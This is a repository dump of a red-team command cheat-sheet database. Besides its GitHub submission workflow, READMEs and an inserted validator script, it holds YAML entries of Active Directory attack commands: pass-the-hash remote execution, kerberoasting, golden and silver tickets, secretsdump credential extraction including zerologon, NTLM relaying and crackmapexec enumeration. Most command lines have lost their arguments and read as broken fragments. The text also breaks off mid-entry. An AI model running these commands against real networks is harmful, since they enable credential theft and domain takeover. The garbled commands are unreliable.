├── .github
│   ├── ISSUE_TEMPLATE
│   │   ├── SUBMIT_TLDR.yml
│   │   ├── bug_report.md
│   │   └── feature_request.md
│   ├── scripts
│   │   └── issue_helper.py
│   └── workflows
│       └── add_labels.yml
├── .gitignore
├── README-zh.md
├── README.md
├── db
│   └── db.json
└── files
    ├── Active_directory
    │   ├── Impacket
    │   │   ├── impacket-execute.yaml
    │   │   ├── impacket-kerberos.yaml
    │   │   ├── impacket-secrets.yaml
    │   │   ├── impacket-servertool-mitm.yaml
    │   │   ├── impacket-smb_msrpc.yaml
    │   │   └── impacket.yaml
    │   ├── bloodhound.yaml
    │   ├── cme.yaml
    │   ├── kerberos.yaml
    │   ├── laps.yaml
    │   ├── lsassy.yaml
    │   ├── mitm6.yaml
    │   ├── responder.yaml
    │   ├── rpcclient.yaml
    │   ├── rubeus.yaml
    │   └── spooler_service_abuse.yaml
    ├── Archive
    │   ├── 7z.yaml
    │   ├── gzip.yaml
    │   ├── rar.yaml
    │   ├── tar.yaml
    │   └── zip.yaml
    ├── BruteForce
    │   ├── hydra.yaml
    │   └── wordlist
    │       ├── cewl.yaml
    │       └── crunch.yaml
    ├── Cloud
    │   └── aws.yaml
    ├── Crypto
    │   └── gpg.yaml
    ├── Database
    │   ├── mssql-exec-elevation.yaml
    │   └── mssql-exec-xpcmdshell.yml
    ├── Deserialization
    │   ├── ysoserial.net.yaml
    │   └── ysoserial.yaml
    ├── Files
    │   ├── Download
    │   │   ├── certutil.yaml
    │   │   └── powershell.yaml
    │   └── Server
    │       └── server.yaml
    ├── Install
    │   ├── brew.yaml
    │   └── yum.yaml
    ├── Language
    │   ├── Java
    │   │   ├── java.yaml
    │   │   └── keytool.yaml
    │   ├── c.yaml
    │   ├── javascript.yaml
    │   ├── nodejs.yaml
    │   └── php.yaml
    ├── Linux
    │   ├── crontab.yaml
    │   ├── grep.yaml
    │   ├── i686-w64-mingw32-gcc.yaml
    │   ├── linux.yaml
    │   ├── misc.yaml
    │   └── sed.yaml
    ├── Metsaploit
    │   ├── msf.yaml
    │   └── searchsploit.yaml
    ├── Mobile
    │   └── Android
    │       ├── android.yaml
    │       ├── apktool.yaml
    │       ├── jadx.yaml
    │       └── objection.yaml
    ├── Network
    │   └── network.yaml
    ├── New
    │   └── test.yml
    ├── Password cracking
    │   ├── crackfiles.yaml
    │   ├── hashcat.yaml
    │   └── john.yaml
    ├── Password extraction
    │   ├── lazagne.yaml
    │   ├── mimikatz.yaml
    │   └── procdump.yaml
    ├── Protocol
    │   ├── dns.yaml
    │   ├── ftp.yaml
    │   ├── ldap.yaml
    │   ├── mssql.yaml
    │   ├── mysql.yaml
    │   ├── netbios.yaml
    │   ├── nfs.yaml
    │   ├── pop.yaml
    │   ├── postgres.yaml
    │   ├── rdp.yaml
    │   ├── smb
    │   │   ├── enum4linux.yaml
    │   │   ├── smb.yaml
    │   │   └── smbmap.yaml
    │   ├── smtp.yaml
    │   ├── snmp.yaml
    │   ├── ssh.yaml
    │   ├── telnet.yaml
    │   ├── vnc.yaml
    │   ├── winrm.yaml
    │   └── x11.yaml
    ├── Pwn
    │   └── bof.yaml
    ├── Race Condition
    │   └── racecondition.yaml
    ├── ReverseShell
    │   ├── msfvenom.yaml
    │   ├── nc.yaml
    │   └── reverse_shell.yaml
    ├── SQL Injection
    │   └── sqlmap.yaml
    ├── Scan
    │   └── nmap.yaml
    ├── Services
    │   ├── service.yaml
    │   └── systemctl.yaml
    ├── Tools
    │   ├── docker.yaml
    │   ├── git.yaml
    │   └── kubernetes.yaml
    ├── Web
    │   ├── drupwn.yaml
    │   ├── fuzzer.yaml
    │   ├── jwttool.yaml
    │   ├── openssl.yaml
    │   ├── tomcat.yaml
    │   ├── web.yaml
    │   └── wpscan.yaml
    ├── Wifi
    │   └── wifi.yaml
    └── Windows
        ├── forfiles.yaml
        ├── netsh.yaml
        ├── openrdp.yaml
        ├── powercfg.yaml
        ├── powershell.yaml
        ├── schtasks.yaml
        ├── tasklist.yaml
        ├── tscon.yaml
        ├── tskill.yaml
        ├── useradd.yaml
        ├── windows.yaml
        └── wmic.yaml

--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/SUBMIT_TLDR.yml:
--------------------------------------------------------------------------------
name: 提交文档
description: 提交文档
title: "提交文档-[全英文名称]"
labels: [submit-red-tldr-db]
assignees:
  - rvn0xsy
body:
  - type: textarea
    id: yaml_data
    attributes:
      label: 文档内容
      description: TLDR 文档内容,tags不建议超过3个,注意缩进
      placeholder: "
        name: yum
        tags: [yum]
        data: |
          plateform/linux #target/local #cat/UTILS

          List all available packages
          ```
          yum list available
          ```"
      value: |
        ```yaml
        name: yum
        tags: [yum]
        data: |
          plateform/linux #target/local #cat/UTILS

          List all available packages
          ```
          yum list available
          ```

          List all installed packages
          ```
          yum list installed
          ```
        ```
    validations:
      required: true

--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
---
name: Bug report
about: Create a report to help us improve
title: ''
labels: ''
assignees: ''

---

**Describe the bug**
A clear and concise description of what the bug is.

**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error

**Expected behavior**
A clear and concise description of what you expected to happen.

**Screenshots**
If applicable, add screenshots to help explain your problem.

**Desktop (please complete the following information):**
 - OS: [e.g. iOS]
 - Browser [e.g. chrome, safari]
 - Version [e.g. 22]

**Smartphone (please complete the following information):**
 - Device: [e.g. iPhone6]
 - OS: [e.g. iOS8.1]
 - Browser [e.g. stock browser, safari]
 - Version [e.g. 22]

**Additional context**
Add any other context about the problem here.

--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
---
name: Feature request
about: Suggest an idea for this project
title: ''
labels: ''
assignees: ''

---

**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]

**Describe the solution you'd like**
A clear and concise description of what you want to happen.

**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.

**Additional context**
Add any other context or screenshots about the feature request here.

--------------------------------------------------------------------------------
/.github/scripts/issue_helper.py:
--------------------------------------------------------------------------------
import json
import os
import sys
from pathlib import Path

# The workflow hands the whole GitHub event to this script as JSON in PAYLOAD.
PAYLOAD_ENV = os.getenv("PAYLOAD", "{}")
PAYLOAD = json.loads(PAYLOAD_ENV)
issue = PAYLOAD.get("issue", {})
ISSUE_BODY = issue.get("body", "") or ""  # the body is null for an empty issue
LABEL = PAYLOAD.get("label", {}).get("name")
SENDER = PAYLOAD.get("sender", {}).get("login", "")
ISSUE_TITLE = issue.get("title", "")
ACTION = PAYLOAD.get("action")


def get_string_between(o_string, start, end):
    """Return the text between the first `start` and the last `end` after it."""
    if start in o_string:
        s = o_string.index(start) + len(start)
        e = o_string.rfind(end, s)
        if e != -1:
            return o_string[s:e]
    sys.exit(1)


def create_file(name):
    # The submission is the ```yaml ... ``` block of the issue body.
    yaml_data = get_string_between(ISSUE_BODY, "```yaml", "```").strip()
    base_path = Path("files/New").resolve()
    n = Path("files/New/").joinpath(name).with_suffix(".yaml").resolve()
    # Write only if the resolved path sits directly inside files/New; this rejects
    # names such as "../.github/workflows/x" coming from an untrusted issue title.
    if n.parent == base_path:
        with open(n, "w") as y:
            y.write(yaml_data)
        print("Create Success :) ")


def runner():
    # Label applied, document tested and reviewed: check who applied the label
    # and do nothing unless it was the maintainer.
    # Note: this login comparison is case-sensitive, while the `if:` expression in
    # add_labels.yml compares the same login case-insensitively.
    if ACTION == "labeled" and LABEL == "Reviewed" and SENDER == "Rvn0xsy":
        doc_name = get_string_between(ISSUE_TITLE, "[", "]")
        create_file(doc_name)


if __name__ == "__main__":
    runner()

--------------------------------------------------------------------------------
/.github/workflows/add_labels.yml:
--------------------------------------------------------------------------------
name: add labels

on:
  issues:
    types: [ labeled ]

jobs:
  check-issues:
    runs-on: ubuntu-latest
    env:
      PAYLOAD: ${{toJSON(github.event)}}
    if: contains(github.event.issue.title,'[') && contains(github.event.issue.title,']') && github.event.sender.login == 'rvn0xsy' && github.event.label.name == 'Reviewed'
    steps:
      # The third-party actions below are referenced by branch (@master) rather
      # than by a pinned commit SHA, so their code can change under this workflow.
      - name: Check out code
        uses: actions/checkout@master
        with:
          persist-credentials: false
          fetch-depth: 0

      - name: Check Issue
        id: issue_helper
        run: |
          python .github/scripts/issue_helper.py
          # ::set-output is deprecated in favour of writing to $GITHUB_OUTPUT.
          echo "::set-output name=changes::$(git status -s | wc -l)"
      - name: Commit files
        if: steps.issue_helper.outputs.changes > 0
        run: |
          git config --local user.email "action@github.com"
          git config --local user.name "GitHub Action"
          git add .
          git commit -m "Auto Update submit-red-tldr-db [$(date)] :robot:" -a
      - name: Push changes
        if: steps.issue_helper.outputs.changes > 0
        uses: ad-m/github-push-action@master
        with:
          github_token: ${{ secrets.REDTLDR_TOKEN }}
          branch: ${{ github.ref }}

      - name: Create Pending Review Comment
        uses: actions-cool/issues-helper@v3
        with:
          actions: 'create-comment,close-issue'
          token: ${{ secrets.REDTLDR_TOKEN }}
          issue-number: ${{ github.event.issue.number }}
          body: |
            ## 审核通过:
            - 文档已经合并,感谢提交。

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
# Created by .ignore support plugin (hsz.mobi)
### Go template
# Binaries for programs and plugins
*.exe
*.exe~
*.dll
*.so
*.dylib

# Test binary, built with `go test -c`
*.test

# Output of the go coverage tool, specifically when used with LiteIDE
*.out
.DS_Store
# Dependency directories (remove the comment below to include it)
# vendor/
.idea

--------------------------------------------------------------------------------
/README-zh.md:
--------------------------------------------------------------------------------
# Red TL;DR Database

[English](./README.md) | [简体中文](./README-zh.md)

## What is Red TL;DR Database?

Red TL;DR Database is a set of text data that provides search for [red-tldr](https://github.com/Rvn0xsy/red-tldr). If you do not know [red-tldr](https://github.com/Rvn0xsy/red-tldr) yet, read the [documentation](http://payloads.online/red-tldr/) and try it out.

## How to use this data?

You can clone the data locally with `git clone` and keep it up to date later with `git pull`:

```bash
$ git clone https://github.com/Rvn0xsy/red-tldr-db ~/red-tldr-db/
```

## Contributing

red-tldr is a free and open source project, and anyone is welcome to contribute to its development and progress.

- Any problem you run into while using it can be reported through issues.
- Bug fixes can be submitted directly as a [Pull Request](https://github.com/Rvn0xsy/red-tldr-db/pulls) to the dev branch.
- To add a new feature, first create an [issue](https://github.com/Rvn0xsy/red-tldr-db/issues) with a short description and a rough implementation approach; once the proposal is accepted, open a [Pull Request](https://github.com/Rvn0xsy/red-tldr-db/pulls) implementing it.
- Improvements to the documentation are welcome, so that more people can use [red-tldr](https://github.com/Rvn0xsy/red-tldr/), especially the English documentation.
- Submit code contributions as PRs to the dev branch; the main branch is only used to release stable versions.
- For any other question or cooperation, send an email to rvn0xsy@gmail.com.

**Reminder: questions about the project are best raised in [issues](https://github.com/Rvn0xsy/red-tldr-db/issues), so that others with a similar problem can find the solution quickly and we do not have to answer the same questions repeatedly.**

### How to submit your own keywords?

The red-tldr-db data format is very simple; you can add whatever results you want to be able to search for:

```yaml
name: search-name
tags: [keyword,key]
data: |
  DATA
```

### Field description

* name: file name
* tags: search keywords; several are supported
* data: the search result (printed to the terminal)

Once the data is defined, first create an [issue](https://github.com/Rvn0xsy/red-tldr-db/issues) with a short description and the rough implementation approach; once the proposal is accepted, open a [Pull Request](https://github.com/Rvn0xsy/red-tldr-db/pulls) implementing it.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Red TL;DR Database

[English](./README.md) | [简体中文](./README-zh.md)

## What is Red TL;DR Database?

Red TL;DR Database is a set of text data that provides search for [red-tldr](https://github.com/Rvn0xsy/red-tldr). If you don't know [red-tldr](https://github.com/Rvn0xsy/red-tldr) yet, please read the [documentation](http://payloads.online/red-tldr/) and try it out.

## How to use this data?

You can use the `git clone` command to synchronize the data locally, and the `git pull` command to keep it up to date in the future.

```bash
$ git clone https://github.com/Rvn0xsy/red-tldr-db ~/red-tldr-db/
```

## Submit contribution

red-tldr is a free and open source project, and we welcome anyone to contribute to its development and progress.

- Take a look at our [issues](https://github.com/Rvn0xsy/red-tldr-db/issues) list and consider sending a [Pull Request](https://github.com/Rvn0xsy/red-tldr-db/pulls) to the dev branch.
- If you want to add a new feature, please create an [issue](https://github.com/Rvn0xsy/red-tldr-db/issues) first to describe the new feature, as well as the implementation approach. Once a proposal is accepted, create an implementation of the new feature and submit it as a [Pull Request](https://github.com/Rvn0xsy/red-tldr-db/pulls).
- Sorry for my poor English. Improvements for this document are welcome, even some typo fixes.
- If you have great ideas, send an email to rvn0xsy@gmail.com.
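The submission flow the READMEs describe and `add_labels.yml` automates (document name taken from the issue title, YAML taken from the fenced yaml block of the issue body, file written under `files/New`) feeds untrusted issue text into the repository, so the input deserves a check before anything is written. The following validator is an added example in the same Python as `issue_helper.py`; it is not code from the repository. It uses only the standard library (the three-field format is parsed by hand instead of with PyYAML), takes `MAX_TAGS = 3` from the issue template's advice, and `NAME_RE` is a naming policy chosen here; the sample title and body are constructed.

```python
"""Validate a red-tldr-db submission before it is written into files/New.

Added example, not code from the red-tldr-db repository. It mirrors what
.github/scripts/issue_helper.py does once the 'Reviewed' label is applied
(name from the issue title, YAML from the body's fenced yaml block, output
files/New/<name>.yaml) but checks the untrusted input first. Standard
library only, so the name / tags / data format is parsed by hand; MAX_TAGS
follows the advice in SUBMIT_TLDR.yml and NAME_RE is a policy chosen here.
"""
import re
from pathlib import Path

FENCE = "`" * 3  # assembled so that this file contains no literal fence
MAX_TAGS = 3  # the issue template advises no more than 3 tags
NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")  # constructed policy

def name_from_title(title: str) -> str:
    """Document name between the first '[' and the last ']' of the title."""
    start, end = title.find("["), title.rfind("]")
    if start == -1 or end <= start:
        raise ValueError("title does not contain [name]")
    return title[start + 1:end].strip()

def extract_yaml_block(issue_body: str) -> str:
    """Text between the first yaml fence and the last closing fence."""
    start = issue_body.find(FENCE + "yaml")
    if start == -1:
        raise ValueError("no yaml block in issue body")
    start += len(FENCE) + len("yaml")
    end = issue_body.rfind(FENCE)
    if end <= start:
        raise ValueError("unterminated yaml block")
    return issue_body[start:end].strip("\n")

def parse_submission(text: str) -> dict:
    """Parse the name / tags / data: | format described in the README."""
    lines, fields, i = text.splitlines(), {}, 0
    while i < len(lines):
        line = lines[i]
        if not line.strip():
            i += 1
            continue
        key, sep, value = line.partition(":")
        if not sep or line[0] in " \t":
            raise ValueError(f"unexpected line: {line!r}")
        key, value = key.strip(), value.strip()
        if key == "data":
            if value != "|":
                raise ValueError("data must be a literal block scalar (data: |)")
            block, i = [], i + 1
            while i < len(lines) and (not lines[i].strip() or lines[i][0] in " \t"):
                block.append(lines[i])
                i += 1
            # Drop the common indentation, as YAML does for a block scalar.
            indent = min((len(l) - len(l.lstrip()) for l in block if l.strip()), default=0)
            fields["data"] = "\n".join(l[indent:] for l in block).strip("\n") + "\n"
            continue
        if key == "tags":
            if not (value.startswith("[") and value.endswith("]")):
                raise ValueError("tags must be a flow sequence such as [a, b]")
            fields["tags"] = [t.strip().strip("'\"") for t in value[1:-1].split(",") if t.strip()]
        elif key == "name":
            fields["name"] = value.strip("'\"")
        else:
            raise ValueError(f"unknown field: {key}")
        i += 1
    missing = {"name", "tags", "data"} - fields.keys()
    if missing:
        raise ValueError(f"missing field(s): {sorted(missing)}")
    return fields

def destination_path(name: str, base: Path = Path("files/New")) -> Path:
    """Resolve files/New/<name>.yaml and refuse anything that escapes files/New."""
    if not NAME_RE.match(name):
        raise ValueError(f"invalid document name: {name!r}")
    base = base.resolve()
    target = (base / name).with_suffix(".yaml").resolve()
    if target.parent != base:  # the same containment check issue_helper.py makes
        raise ValueError("document name escapes files/New")
    return target

def validate_submission(title: str, issue_body: str) -> dict:
    """Parse and check one submission; returns its fields plus the safe path."""
    doc = parse_submission(extract_yaml_block(issue_body))
    if not 1 <= len(doc["tags"]) <= MAX_TAGS:
        raise ValueError(f"expected 1..{MAX_TAGS} tags, got {len(doc['tags'])}")
    # As in issue_helper.py, the file name comes from the title, not the YAML.
    doc["path"] = destination_path(name_from_title(title))
    return doc

# Constructed sample: title and body in the shape SUBMIT_TLDR.yml produces.
SAMPLE_TITLE = "提交文档-[yum]"
SAMPLE_BODY = "\n".join([
    "### 文档内容", "", FENCE + "yaml", "name: yum", "tags: [yum]", "data: |",
    "  plateform/linux #target/local #cat/UTILS", "", "  List all available packages",
    "  " + FENCE, "  yum list available", "  " + FENCE, FENCE,
])
```

`validate_submission(SAMPLE_TITLE, SAMPLE_BODY)` returns the parsed fields and `files/New/yum.yaml`; a title such as `提交文档-[../../.github/workflows/evil]` is rejected by `destination_path` before any write.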
--------------------------------------------------------------------------------
/db/db.json:
--------------------------------------------------------------------------------
[generated search index: one {"name", "tags", "file"} record per YAML file below; omitted]

--------------------------------------------------------------------------------
/files/Active_directory/Impacket/impacket-execute.yaml:
--------------------------------------------------------------------------------
name: impacket
tags: [impacket, windows, exec]
data: |

  PSEXEC with username
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
  create a new service (using \pipe\svcctl via SMB)

  ```
  psexec.py /:@
  ```

  PSEXEC with pass the Hash (pth)
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
  create a new service (using \pipe\svcctl via SMB)

  ```
  psexec.py -hashes @
  ```

  PSEXEC with kerberos
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
  create a new service (using \pipe\svcctl via SMB)

  ```
  export KRB5CCNAME=; psexec.py -dc-ip -target-ip > -no-pass -k /@
  ```

  wmiexec
  plateform/linux #target/remote #port/135 #protocol/wmi #cat/ATTACK/CONNECT
  Execute a command shell without touching the disk or running a new service using DCOM

  ```
  wmiexec.py /:@
  ```

  wmiexec with pass the hash (pth)
  plateform/linux #target/remote #port/135 #protocol/wmi #cat/ATTACK/CONNECT

  Execute a command shell without touching the disk or running a new service using DCOM

  ```
  wmiexec.py -hashes @
  ```

  atexec - execute command via the task scheduler
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
  Using \pipe\atsvc via SMB

  ```
  atexec.py /:@ "command"
  ```

  atexec pass the hash (pth)
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
  Execute command via the task scheduler (using \pipe\atsvc via SMB)

  ```
  atexec.py -hashes @ "command"
  ```

--------------------------------------------------------------------------------
/files/Active_directory/Impacket/impacket-kerberos.yaml:
--------------------------------------------------------------------------------
name: Impacket
tags: [impacket, windows, kerberos, 88]
data: |

  GetNPUsers without password to get TGT (ASREPRoasting)
  plateform/linux #target/remote #cat/ATTACK/EXPLOIT
  ```
  GetNPUsers.py / -no-pass -request -format hashcat
  ```

  GetNPUsers - attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' (ASREPRoasting)
  plateform/linux #target/remote #cat/ATTACK/EXPLOIT
  ```
  GetNPUsers.py -dc-ip / -usersfile -format hashcat
  ```

  GetUserSPNs - find Service Principal Names that are associated with a normal user account (kerberoasting)
  plateform/linux #target/remote #cat/ATTACK/EXPLOIT
  ```
  GetUserSPNs.py -request -dc-ip /:
  ```

  MS14-068 - goldenPac
  plateform/linux #target/remote #cat/ATTACK/EXPLOIT
  ```
  goldenPac.py -dc-ip /:''@
  ```

  Ticketer - (golden ticket) - generate TGT/TGS tickets into ccache format which can be converted further into kirbi.
  plateform/linux #target/local #cat/ATTACK/EXPLOIT
  ```
  ticketer.py -nthash -domain-sid -domain
  ```

  TicketConverter - convert kirbi files (commonly used by mimikatz) into ccache files used by impacket
  plateform/linux #target/local #cat/UTILS
  ```
  ticketConverter.py
  ```

  Silver ticket - impersonate user
  plateform/linux #target/remote #cat/ATTACK/EXPLOIT
  ```
  getST.py -spn cifs/ /\$ -impersonate
  ```

  GetTGT - request a TGT and save it as ccache for a given password, hash or aesKey
  plateform/linux #target/remote #cat/UTILS
  ```
  getTGT.py -dc-ip -hashes : /
  ```

  GetADUser - gather data about the domain's users and their corresponding email addresses
  plateform/linux #target/remote #cat/RECON
  ```
  GetADUsers.py -all /: -dc-ip
  ```

--------------------------------------------------------------------------------
/files/Active_directory/Impacket/impacket-secrets.yaml:
--------------------------------------------------------------------------------
name: Impacket
tags: [impacket, windows, smb, 445]
data: |

  samrdump - system account, shares, etc... (dump info from the Security Account Manager (SAM))
  plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER
  ```
  samrdump.py /:@
  ```

  secretsdump
  plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER
  ```
  secretsdump.py '/:'@
  ```

  secretsdump local dump hash
  plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER
  ```
  secretsdump.py -ntds -system -hashes LOCAL -outputfile
  ```

  secretsdump - anonymous get administrator
  zerologon
  plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER
  ```
  secretsdump.py /\$/@ -no-pass -just-dc-user "Administrator"
  ```

  secretsdump - remote extract
  plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER
  ```
  secretsdump.py -just-dc-ntlm -outputfile /:@
  ```

  secretsdump - remote extract + user info
  plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER
  ```
  secretsdump.py -just-dc -pwd-last-set -user-status -outputfile /:@
  ```

--------------------------------------------------------------------------------
/files/Active_directory/Impacket/impacket-servertool-mitm.yaml:
--------------------------------------------------------------------------------
name: Impacket
tags: [smbserver- share smb folder]
data: |
  plateform/linux #target/serve #port/445 #protocol/smb #cat/ATTACK/LISTEN-SERVE

  A Python implementation of an SMB server. Allows to quickly set up shares and user accounts.

  ```
  smbserver.py
  ```

  smbserver - share smb folder with authentication
  plateform/linux #target/serve #port/445 #protocol/smb #cat/ATTACK/LISTEN-SERVE

  ```
  smbserver.py -username -password
  ```

  ntlmrelay - host a payload that will automatically be served to the remote host connecting
  plateform/linux #target/serve #cat/ATTACK/MITM

  ```
  ntlmrelayx.py -tf -smb2support -e
  ```

  ntlmrelay - socks
  plateform/linux #target/serve #cat/ATTACK/MITM
  ```
  ntlmrelayx.py -tf -socks -smb2support
  ```

  ntlmrelay - authenticate and dump hash
  plateform/linux #target/serve #cat/ATTACK/MITM
  ```
  ntlmrelayx.py -tf -smb2support
  ```

  ntlmrelay - to use with mitm6 - relay to target
  plateform/linux #target/serve #cat/ATTACK/MITM
  Next use the socks with proxychains:
  proxychains smbclient //ip/Users -U domain/user

  ```
  ntlmrelayx.py -6 -wh -t smb:// -l /tmp -socks -debug
  ```

  ntlmrelay - to use with mitm6 - delegate access
  plateform/linux #target/serve #cat/ATTACK/MITM
  ```
  ntlmrelayx.py -t ldaps:// -wh --delegate-access
  ```

--------------------------------------------------------------------------------
/files/Active_directory/Impacket/impacket-smb_msrpc.yaml:
--------------------------------------------------------------------------------
name: impacket
tags: [smbclient- connect to smb on the target]
data: |
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT

  A generic SMB client that will let you list shares and files, rename, upload and download files and create and delete directories, all using either username and password or username and hashes combination.

  -hashes :
  -no-pass -k : kerberos authentication

  ```
  smbclient.py /:@
  ```

--------------------------------------------------------------------------------
/files/Active_directory/Impacket/impacket.yaml:
--------------------------------------------------------------------------------
name: Impacket
tags: [impacket, windows, smb, 445]
data: |

  lookupsid - SID User Enumeration, extract the information about what users exist and their data.
  plateform/linux #target/remote #cat/RECON

  ```
  lookupsid.py /:@
  ```

  reg - query registry info remotely
  plateform/linux #target/remote #cat/RECON
  ```
  reg.py /:@ query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s
  ```

  rpcdump - list rpc endpoint
  plateform/linux #target/remote #cat/RECON
  ```
  rpcdump.py /:@
  ```

  services.py - (start, stop, delete, read status, config, list, create and change any service) remote
  plateform/linux #target/remote #cat/RECON #cat/ATTACK/EXPLOIT
  ```
  services.py /:@
  ```

  getarch - find target architecture (64 or 32 bits)
  plateform/linux #target/remote #cat/RECON
  ```
  getArch.py -target
  ```

  netview - enumeration tool (ip/shares/sessions/logged users) - need dns set
  plateform/linux #target/remote #cat/RECON
  ```
  netview.py / -target -users
  ```

--------------------------------------------------------------------------------
/files/Active_directory/bloodhound.yaml:
--------------------------------------------------------------------------------
name: bloodhound
tags: [bloodhound, Active directory enumeration]
data: |

  start neo4j server
  plateform/linux #target/serve #cat/UTILS
  https://neo4j.com/docs/

  ```bash
  neo4j console start
  ```

  bloodhound start IHM
  plateform/linux #target/local #cat/RECON
https://github.com/BloodHoundAD/BloodHound 16 | 17 | ```bash 18 | bloodhound 19 | ``` 20 | 21 | bloodhound - collect data 22 | plateform/linux #target/remote #port/389 #port/631 #cat/RECON 23 | https://github.com/fox-it/BloodHound.py 24 | 25 | ```bash 26 | bloodhound-python -d -u -p -c all 27 | ``` 28 | 29 | bloodhound - collect data (alternative) 30 | plateform/linux #target/remote #port/389 #port/631 #cat/RECON 31 | https://github.com/fox-it/BloodHound.py 32 | 33 | ```bash 34 | bloodhound-python -d -u -p -gc -dc -c all 35 | ``` 36 | 37 | sharphound - collect bloodhound data 38 | plateform/windows #target/remote #port/389 #port/631 #cat/RECON 39 | https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors 40 | 41 | ```powershell 42 | import-module sharphound.ps1 43 | invoke-bloodhound -collectionmethod all -domain 44 | ``` 45 | 46 | cypheroth - start 47 | plateform/linux #target/local #cat/RECON 48 | Toolset that runs cypher queries against Bloodhound's Neo4j backend and saves output to spreadsheets. 49 | 50 | https://github.com/seajaysec/cypheroth 51 | 52 | ```bash 53 | cypheroth -u -p -d 54 | ``` 55 | 56 | aclpwn - from computer to domain - dry run 57 | plateform/linux #target/local #cat/RECON 58 | Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. 
59 | 60 | https://github.com/fox-it/aclpwn.py 61 | 62 | ``` 63 | aclpwn -f -ft computer -d -dry 64 | ``` 65 | 66 | 67 | 68 | -------------------------------------------------------------------------------- /files/Active_directory/cme.yaml: -------------------------------------------------------------------------------- 1 | name: cme 2 | tags: [cme, crackmapexec, windows, Active directory] 3 | data: | 4 | 5 | cme - enumerate hosts, network 6 | plateform/linux #target/remote #port/445 #protocol/smb #cat/RECON 7 | Exemple : cme smb 192.168.1.0/24 8 | 9 | https://mpgn.gitbook.io/crackmapexec/ 10 | 11 | ```bash 12 | cme smb 13 | ``` 14 | 15 | cme - enumerate password policy 16 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 17 | 18 | ```bash 19 | cme smb -u -p '' --pass-pol 20 | ``` 21 | 22 | cme - enumerate null session 23 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/CONNECT 24 | 25 | ```bash 26 | cme smb -u '' -p '' 27 | ``` 28 | 29 | cme - enumerate anonymous login 30 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/CONNECT 31 | 32 | ```bash 33 | cme smb -u 'a' -p '' 34 | ``` 35 | 36 | cme - enumerate active sessions 37 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 38 | 39 | ```bash 40 | cme smb -u -p '' --sessions 41 | ``` 42 | 43 | cme - enumerate domain users 44 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 45 | 46 | ```bash 47 | cme smb -u -p '' --users 48 | ``` 49 | 50 | cme - enumerate users by bruteforce the RID 51 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 52 | 53 | ```bash 54 | cme smb -u -p '' --rid-brute 55 | ``` 56 | 57 | cme - enumerate domain groups 58 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 59 | 60 | ```bash 61 | cme smb -u -p '' --groups 62 | ``` 63 | 64 | cme - enumerate local groups 65 | plateform/linux #target/remote 
#port/445 #port/139 #protocol/smb #cat/RECON 66 | 67 | ```bash 68 | cme smb -u -p '' --local-groups 69 | ``` 70 | 71 | cme - enumerate shares 72 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 73 | 74 | Enumerate permissions on all shares 75 | 76 | ```bash 77 | cme smb -u -p -d --shares 78 | ``` 79 | 80 | cme - enumerate disks 81 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 82 | 83 | Enumerate disks on the remote target 84 | 85 | ```bash 86 | cme smb -u -p '' --disks 87 | ``` 88 | 89 | cme - enumerate smb target not signed 90 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 91 | 92 | Maps the network of live hosts and saves a list of only the hosts that don't require SMB signing. List format is one IP per line 93 | 94 | ```bash 95 | cme smb --gen-relay-list smb_targets.txt 96 | ``` 97 | 98 | cme - enumerate logged users 99 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 100 | 101 | ```bash 102 | cme smb -u -p '' --loggedon-users 103 | ``` 104 | 105 | cme - enable wdigest 106 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT #warning/modify_target 107 | 108 | enable/disable the WDigest provider and dump clear-text credentials from LSA memory. 
